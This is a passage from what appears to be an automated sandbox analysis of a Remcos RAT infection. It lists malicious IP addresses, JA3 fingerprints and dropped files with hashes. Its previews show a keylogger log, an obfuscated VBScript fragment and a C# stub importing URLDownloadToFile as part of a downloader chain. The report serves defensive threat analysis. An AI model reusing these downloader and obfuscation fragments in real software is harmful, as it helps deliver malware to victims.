                                                              • 104.170.120.236
                                                              na.elfGet hashmaliciousMiraiBrowse
                                                              • 198.12.122.175
                                                              BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                              • 107.173.4.16
                                                              ATOM86-ASATOM86NLDHL_Shipping_Invoices_Awb_0000000.vbsGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              Custom Export Tax Recovery Form.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50
                                                              Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50
                                                              WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              na.rtfGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://redealmucusin.uk/Get hashmaliciousUnknownBrowse
                                                              • 185.199.111.133
                                                              DHL_Shipping_Invoices_Awb_0000000.vbsGet hashmaliciousRemcosBrowse
                                                              • 185.199.111.133
                                                              nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbsGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                              • 185.199.111.133
                                                              EQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                                              • 185.199.111.133
                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                              • 185.199.111.133
                                                              Snvlerier.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 185.199.111.133
                                                              3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.111.133
                                                              3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.111.133
                                                              Snvlerier.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 185.199.111.133
                                                              ASL OTSL 2 ship's Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 185.199.111.133

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\ProgramData\remcos\logs.dat

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):144
                                                              Entropy (8bit):3.38816599775145
                                                              Encrypted:false
                                                              SSDEEP:3:rhlKlM+UlRl+WlpFNqlDl5JWRal2Jl+7R0DAlBG45klovDl6v:6ly0WrF4b5YcIeeDAlOWAv
                                                              MD5:76B0003B48DE3FA8602CCEF87010BD89
                                                              SHA1:30CAE1408803E1B65FBF43050A59961EEDCF6F42
                                                              SHA-256:3A6DDB92CB546C7BDBDCC2E921BF080C1FFF65C9F09C55BA727496576D73C1F8
                                                              SHA-512:6E7B38C9064136E7EC34231DBC5BDDFFD9610E98047E418B4E6287B1BD9C0347808FC3DFD72C28EAB86C3348A551E9DDCE932C22ECAE9FDEDD898879E47D4927
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                              Preview:....[.2.0.2.4./.1.0./.1.4. .0.5.:.3.6.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):962
                                                              Entropy (8bit):5.013130376969173
                                                              Encrypted:false
                                                              SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                              MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                              SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                              SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                              SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                              Malicious:false
                                                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seethebestpricewithgoodcookiesme[1].tiff

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):195824
                                                              Entropy (8bit):3.733217557919086
                                                              Encrypted:false
                                                              SSDEEP:3072:asQ4xYsrlTzTSTB3SJrS5GhHLgt5pxGwUAu6zUhYpt0nb2PRJ7oWdHIx:GUYsrlTyN3IS52lwt0nM5U
                                                              MD5:5A71149A9C997CDCB94F1A84860417F7
                                                              SHA1:9D80F853425AE99D844A70CEBAA59AEE73C537D1
                                                              SHA-256:FF6B47D315645FDDC632876AE60A1A33A3E9138CEEF8A073D2FE8779208F7D8C
                                                              SHA-512:448D914AA714C3DEAB84218BEDA6A3E94A9A5B8A5D912178F72A2EA82C73AD6DDB86A8E3443785FDCE8D9FD876C5DF7C26CD878DFA33F432E38AD62FF0E91C1B
                                                              Malicious:false
                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .a.l.m.e.c.e.g.u.e.i.r.a.(.f.l.u.c.t.u.a.d.o.r.,. .d.e.s.v.a.r.i.a.r.,. .m.i.l.i.c.i.a.n.o.,. .m.o.a.n.s.a.,. .h.e.m.i.a.t.r.o.p.h.i.a.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.f. .L.C.

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1628158735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllul6/l/z:NllU6t/
                                                              MD5:D5FB08C0907CE5EF0FBA9194CE138AEE
                                                              SHA1:3CD0149D806186D955985F25EEC91BB95AB3BD47
                                                              SHA-256:FB7F816D549701FEEB83DF1309A7D8193FFB3F5809119DADB385B3E697113DB3
                                                              SHA-512:A2F6A7DCC981F7BD5490B6C07BF7CC7EC5D2FC377380E628B95AB1627FEC53F6994AB32315E22A39DD337300FC83512C9029C15910E7ED570612C5798EF27145
                                                              Malicious:false
                                                              Preview:@...e.................................F..............@..........

                                                              C:\Users\user\AppData\Local\Temp\RESC057.tmp

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Oct 14 11:23:41 2024, 1st section name ".debug$S"
                                                              Category:dropped
                                                              Size (bytes):1336
                                                              Entropy (8bit):3.9821609051742612
                                                              Encrypted:false
                                                              SSDEEP:24:HHm9plAtgpHOwKTFexmfwI+ycuZhNdSlYakS0SlNPNnqSSd:SlAtYNKTAxmo1ulIGa35FqSC
                                                              MD5:F9CB5E3EFFED4E562A6579E52C8D28E3
                                                              SHA1:444F6ADC7322C3CAF7FF324D62354E129A7E8EA4
                                                              SHA-256:F3A142E1848C74319F1BC06E1F4E14A78501E599A1918732828B04EB20105F32
                                                              SHA-512:FE8A26973E5A147D25B14A1DBFCAD3CB9854DE275E2868D63725F91241AB9853300221EED67855F1EB552AB075A6F5B240AF63BF9E85BC749E68DF17E1B4B6DE
                                                              Malicious:false
                                                              Preview:L...=..g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP......................`.=C.Kq.e-[W..........5.......C:\Users\user\AppData\Local\Temp\RESC057.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.4.4.l.x.5.y.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4woyycu2.4fs.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_euig21v5.xii.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eywarogv.yqa.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fr42fqsl.f13.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_meuczva5.5dy.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_se4co4er.yur.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tamrtuw1.sm5.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ux0yfj5m.t3q.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnysmfwq.kmh.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xu3cfo43.bvp.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\bhv29F.tmp

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                              Category:dropped
                                                              Size (bytes):15728640
                                                              Entropy (8bit):0.10106922760070924
                                                              Encrypted:false
                                                              SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                              MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                              SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                              SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                              SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                              Malicious:false
                                                              Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\icthiyu

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):2
                                                              Entropy (8bit):1.0
                                                              Encrypted:false
                                                              SSDEEP:3:Qn:Qn
                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                              Malicious:false
                                                              Preview:..

                                                              C:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                              File Type:MSVC .res
                                                              Category:dropped
                                                              Size (bytes):652
                                                              Entropy (8bit):3.101570989095812
                                                              Encrypted:false
                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynSlYak7Ynqq0SlNPN5Dlq5J:+RI+ycuZhNdSlYakS0SlNPNnqX
                                                              MD5:19B37F9260853D43134B71F1652D5B57
                                                              SHA1:4F26C0ECE1513EDC38D1E6E1F327F79922289F11
                                                              SHA-256:DEA1F12028C4F8C85DF54BB1D95561D54E73F59F1FECF78CD42B0931BB56D313
                                                              SHA-512:6C7EFB6418561ACC02BD7CA268A4FF7630AD427CEE25E4F5EFE65202EE3CA47D80B3C16E560778B7C12F0B628D35FF05DDA779107DC488E36B89BAD799B17E57
                                                              Malicious:false
                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.4.4.l.x.5.y.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.4.4.l.x.5.y.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                              C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.0.cs

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):3.8343091223020105
                                                              Encrypted:false
                                                              SSDEEP:6:V/DsYLDS81zuTocE05NVMGpJ/RQXReKJ8SRHy4HnHy7mLmW8jvwy:V/DTLDfuToXSJ8XfHmc8jvwy
                                                              MD5:CF949A7E29735AD6B8A09C0CC0BEAE97
                                                              SHA1:DC92E9E10F38AEAB463C00E9D75C8DBF2079C789
                                                              SHA-256:445F4CADD6D07292E03D69E62FAC1AB63AD9E3AC760E46D367BEA04A4604B7B4
                                                              SHA-512:29C63C01AED8621DE822517BACFE90130EF54C77A73EDFC2036DF8A1CD182B1F6A4ACFA9742B81F7276A99CF01D98F012A5A8C06F87B4C1620F92D2CCEB36041
                                                              Malicious:false
                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace oMzzGcMyN.{. public class guMpbbeGdW. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr GmfRpUt,string PMdXvN,string Ft,uint axxsiASHf,IntPtr xHWSy);.. }..}.

                                                              C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):371
                                                              Entropy (8bit):5.229618699662127
                                                              Encrypted:false
                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923ft0zxs7+AEszI923f3:p37Lvkmb6KzqWZE2P
                                                              MD5:75A17E40A5022CDF841B6B490EC1E4D3
                                                              SHA1:4408AD06DC6DBAFC3B76D228C0FF12AC921A27AA
                                                              SHA-256:4EB84A9CE242DADEBBB8ECF1FFBF2E745E3228155B4E9F27CF46E0FC86CFFAE1
                                                              SHA-512:D879B2A62B1E5F2056C17D3B3C044F84C507D335DF2084ED27612230697B2E101897A9E66D28049DA24F260ED7E324BE3EC60269BDF32CAC3351651D16ACD55F
                                                              Malicious:true
                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.0.cs"

                                                              C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.dll

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3072
                                                              Entropy (8bit):2.840968302990965
                                                              Encrypted:false
                                                              SSDEEP:24:etGSVPBG5eAdF8c/kSyffUQxtkZfP98iMEWI+ycuZhNdSlYakS0SlNPNnq:6WsAdeoyEQ8JP9tMn1ulIGa35Fq
                                                              MD5:5C914F440C02769E93D511B81D69F5E0
                                                              SHA1:046E596B5FCE741E70D76DBC331D18A12EAE5DCE
                                                              SHA-256:D016F5A1F187DA50AB9F0E1AE49CFCD3032C2D55833CDA216591D2E495FD4683
                                                              SHA-512:E0330EF66B11A6353980668A32836C84E31BAE00FB095307028A240E9D994749E7192755A4AF1AE6960398C89442FBC2ED587C446DE4DD33BDED94E5390C0F80
                                                              Malicious:false
